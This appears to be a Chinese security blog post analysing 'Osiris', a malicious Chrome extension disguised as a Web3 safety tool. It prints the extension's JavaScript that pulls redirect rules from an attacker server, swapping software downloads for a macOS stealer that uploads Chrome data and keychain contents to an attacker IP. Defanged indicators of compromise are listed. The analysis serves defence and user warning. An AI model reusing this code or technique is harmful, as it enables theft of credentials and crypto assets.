挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

admin 2025年5月29日00:23:50评论2 views字数 2800阅读9分20秒阅读模式

作者:Thinking

编辑:Liz 

背景

今日,社交平台 X 上的用户 @0xmaoning 联系慢雾安全团队寻求帮助,表示发现浏览器扩展“Osiris”存在钓鱼嫌疑,隐蔽性极强,自己差点中招,希望我们协助分析以避免更多人受害。

经过慢雾安全团队的深入分析,该恶意浏览器扩展会替换用户正常的下载链接,重定向到恶意程序的下载链接,用户不知不觉下载安装了恶意程序,导致加密资产的损失。在此,特别感谢 X 用户 @0xmaoning 和 @Onefly_eth 提供的线索与反馈,为本次分析提供了关键支持,有效避免更多用户落入陷阱。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

相关攻击信息

恶意浏览器扩展下载地址:

https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf

恶意程序下载地址:

https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg

恶意站点:

https[:]//osiris.vip/

恶意程序上传数据:

http[:]//192.124.178.88

钓鱼技巧分析

攻击者通过社交平台推荐目标用户下载恶意浏览器扩展“Osiris”,该扩展伪装成 Web3 安全工具,美其名曰帮助用户识别 Web3 欺诈,钓鱼,恶意程序等,实则心怀不轨。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

恶意浏览器扩展下载地址(风险提醒:注意要在隔离的环境中分析):https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf。

我们分析恶意浏览器扩展的代码,发现该扩展通过“chrome.declarativeNetRequest.updateDynamicRules”的方式设置网络请求的规则。

代码内容如下所示:

function fetchDynamicRules() {  chrome.storage.local.get("uid"data => {    const uid = data.uid ? data.uid : "";    const uidParam = uid ? `?uid=${uid}` : "";    fetch(`${BASE_URL}/security${uidParam}`)      .then(response => response.json())      .then(rules => {        if (!rules || !Array.isArray(rules)) {          console.warn("Rules incorrect.");          return;        }        const ruleIds = rules.map(rule => rule.id);        chrome.declarativeNetRequest.updateDynamicRules({          removeRuleIds: ruleIds,          addRules: rules        }, () => {          console.log("Rules updated", rules);        });      })      .catch(err => console.error("Error fetching rules:", err));  });}

网络请求的规则是从攻击者控制的服务器上获取的。

规则获取的请求:https[:]//osiris.vip/security?uid=aauyaxxsyd。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

获取并添加规则到“chrome.declarativeNetRequest.updateDynamicRules”后,目标用户后续的网络请求如果匹配到了规则就会被替换。

攻击者设置的规则是:

  • 匹配所有以 .exe,dmg,zip 结尾的 URL;

  • 仅针对网页主框架(地址栏 URL)或子框架(iframe) 的请求;

  • 替换成恶意程序下载链接。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

有关 declarativeNetRequest 的介绍可以参考:https://developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

因此,在目标用户安装完恶意扩展后,攻击者还会引导用户去某些应用程序的官网(如:Notion 的官网)下载应用程序,从而触发下载链接替换的陷阱。触发后,虽然浏览器中的下载记录显示的是应用程序官方的来源,但是下载的程序已经被替换成恶意程序了,攻击者巧妙地利用了浏览器展示上的缺陷对用户进行欺骗。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

恶意程序分析

我们以 macOS 版本的恶意程序为例进行分析。

恶意程序下载地址(风险提醒:注意要在隔离的环境中进行分析):https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg。

恶意程序被打开后会引导用户打开终端,并将 Installer 拖到终端中运行。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

用户实则是将 Installer.kmo 放到了终端中运行。Installer.kmo 使用了 base64 编码隐藏攻击者的代码意图,同时要求用户输入电脑密码以获取权限,从而读取敏感数据。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析
挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

解码后发现是使用 bash 运行了一段 AppleScript 脚本。该 AppleScript 是为了运行 .Installer:

1. 查找目标磁盘,通过 AppleScript 列出所有挂载的磁盘,找到名称包含 Installer 的磁盘;

2. 复制隐藏安装程序,将该磁盘中的隐藏文件 .Installer 复制到 /tmp 目录,并赋予执行权限;

3. 静默执行,直接运行复制的安装程序,过程中通过 try 块抑制错误,无任何验证或用户交互。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

运行 .Installer 后,会将用户的 Chrome 浏览器数据和 keychain 等数据进行打包,然后上传到 192.124.178.88。攻击者拿到这些数据后可以尝试解码获取 Web3 钱包的私钥或助记词,从而盗取用户的资产,也可以获取用户 Chrome 中保存的账号密码,进而接管用户的社交平台账号、加密货币平台账号等。

挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析
挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

类似的攻击手法我们此前已分析过,感兴趣的读者见眼见不为实|假 Zoom 会议钓鱼分析

总结

真安全无需过度承诺,伪工具终难掩饰杀机。Web3 世界机遇与风险并存,以“安全”为名的解决方案或者工具推荐,也可能成为被攻击者利用的用户心理突破口。这类伪装成“安全工具”的扩展程序通过劫持下载链接、植入恶意代码等手段窃取加密资产和用户数据,已有用户蒙受损失。鉴于此,慢雾安全团队提醒广大用户避免安装不知名的程序,扩展等,也不要轻信陌生人的方案或者工具推荐。此外,建议用户通过安装知名杀毒软件,进一步加强端上的安全防御。

原文始发于微信公众号(慢雾科技):挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月29日00:23:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析https://cn-sec.com/archives/4108972.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息